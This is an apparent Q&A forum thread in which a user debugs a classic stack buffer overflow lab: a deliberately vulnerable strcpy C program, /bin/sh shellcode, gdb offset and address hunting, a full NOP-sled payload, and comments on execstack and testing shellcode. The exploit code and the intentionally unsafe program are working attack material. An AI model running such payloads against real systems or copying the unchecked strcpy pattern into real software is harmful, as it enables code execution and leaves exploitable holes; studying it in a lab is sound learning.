# Buffer Overflow not spawing shell?

Tags: c, buffer-overflow

Note: This is only for educational purposes.

Below is the exploit elements.

Script:

```
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]){
    char buf[500];
    printf ("Input> ");
    strcpy(buf, argv[1]);
    printf("Entered: %s\n", buf);
    return 0;
}
```

shellcode:

```
\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
```

which is 46 bytes

GCC: `gcc -fno-stack-protector buf.c`

system type: little endian, x64 bit architecture.

**Explanation**

I believe we need 526 bytes to exploit the buffer, how did I figure it out you might ask? below:

```
 $ gdb -q ./a.out

 (gdb) run ./a.out $(python -c "print 'A'*526")

 Starting program: /tmp/guest-hdi3i7/a.out ./a.out $(python -c "print 
'A'*526")
Input> Entered: ./a.out
[Inferior 1 (process 7045) exited normally]
(gdb) run $(python -c "print 'A'*526")
Starting program: /tmp/guest-hdi3i7/a.out $(python -c "print 'A'*526")
Input> Entered:     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
```

start of the buf in the stack is `0x7fffffffd860`. how did I figure it out?

```
(gdb) disass main
Dump of assembler code for function main:
0x0000000000400566 <+0>:    push   %rbp
0x0000000000400567 <+1>:    mov    %rsp,%rbp
0x000000000040056a <+4>:    sub    $0x210,%rsp
0x0000000000400571 <+11>:   mov    %edi,-0x204(%rbp)
0x0000000000400577 <+17>:   mov    %rsi,-0x210(%rbp)
0x000000000040057e <+24>:   mov    $0x400654,%edi
0x0000000000400583 <+29>:   mov    $0x0,%eax
0x0000000000400588 <+34>:   callq  0x400440 <printf@plt>
0x000000000040058d <+39>:   mov    -0x210(%rbp),%rax
0x0000000000400594 <+46>:   add    $0x8,%rax
0x0000000000400598 <+50>:   mov    (%rax),%rdx
0x000000000040059b <+53>:   lea    -0x200(%rbp),%rax
0x00000000004005a2 <+60>:   mov    %rdx,%rsi
0x00000000004005a5 <+63>:   mov    %rax,%rdi
0x00000000004005a8 <+66>:   callq  0x400430 <strcpy@plt>
0x00000000004005ad <+71>:   lea    -0x200(%rbp),%rax
0x00000000004005b4 <+78>:   mov    %rax,%rsi
0x00000000004005b7 <+81>:   mov    $0x40065c,%edi
0x00000000004005bc <+86>:   mov    $0x0,%eax
0x00000000004005c1 <+91>:   callq  0x400440 <printf@plt>
0x00000000004005c6 <+96>:   mov    $0x0,%eax
0x00000000004005cb <+101>:  leaveq 
---Type <return> to continue, or q <return> to quit---
0x00000000004005cc <+102>:  retq   
End of assembler dump.
```

and then:

```
(gdb) break *0x00000000004005b7

(gdb) run $(python -c "print 'A'*526")
(gdb) x/200x $rsp
0x7fffffffd850: 0xffffdb48  0x00007fff  0x01958ac0  0x00000002
0x7fffffffd860: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffd870: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffd880: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffd890: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffd8a0: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffd8b0: 0x41414141  0x41414141  0x41414141  0x41414141
```

$rbp is also replaced:

```
(gdb) x/x $rbp
0x7fffffffda60: 0x41414141
```

**Finally the exploit:**

so 46 bytes shellcode + 474 of NOP + 6 bytes of stack address = 526 as below should work right? well it doesn't, at least for me.

```
(gdb) run $(python -c "print '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'\x90'*474+'\x60\xd8\xff\xff\xff\x7f'")
```

with above I **get:**

```
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/guest-hdi3i7/a.out $(python -c "print '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'\x90'*474+'\x60\xd8\xff\xff\xff\x7f'")
Input> Entered: 1��F1�1�̀�[1��C��C
                              �
                               ��S
                                  �����/bin/sh������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������`����

Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffd860 in ?? ()
```

**Is there any thing That I am missing?**

Comment: You should put the NOPs _in front of_ the shellcode, because you try to jump into the middle of the NOPs, which are then executed until the IP reaches the shellcode.

Comment: @ctx just tried it, didn't work :(

Comment: Did you try to launch your shellcode directly? Does that work? Maybe already that is flawed

Comment: @ctx how do I directly launch it?

Comment: put it into a buffer on the stack, cast that buffer to a function pointer and jump to it.

Comment: @ctx like this: #include <stdio.h>
char shellcode[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
 
int main(int argc, char **argv) {
 int *ret;
 ret = (int *)&ret + 2;  
 (*ret) = (int)shellcode;
}  well after running this I don't get nothing

Comment: No, try `((void (*)()) shellcode)();` to jump into your shellcode

Comment: @Ctx you'll probably have to disable stack noexec for that.

Comment: @Shawn this is _exactly_ one of the points that should be tested here; if his stack is non-executable, the thing that the OP tries will never work

Comment: @Ctx So i tried: #include <stdio.h>
char shellcode[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc$
int main(int argc, char **argv) {
        int *ret;
        ((void (*)()) shellcode)();
} but it says Segmentation fault (core dumped)

Comment: @Ctx , @Shawn, yay i suppose it worked with `-z execstack` but my exploit spawned just an empty place where I can write stuff but no commands, e.g. if I do `echo hi`, i get nothing, or `ls` doesn't show current directories/files. I am logged in as guest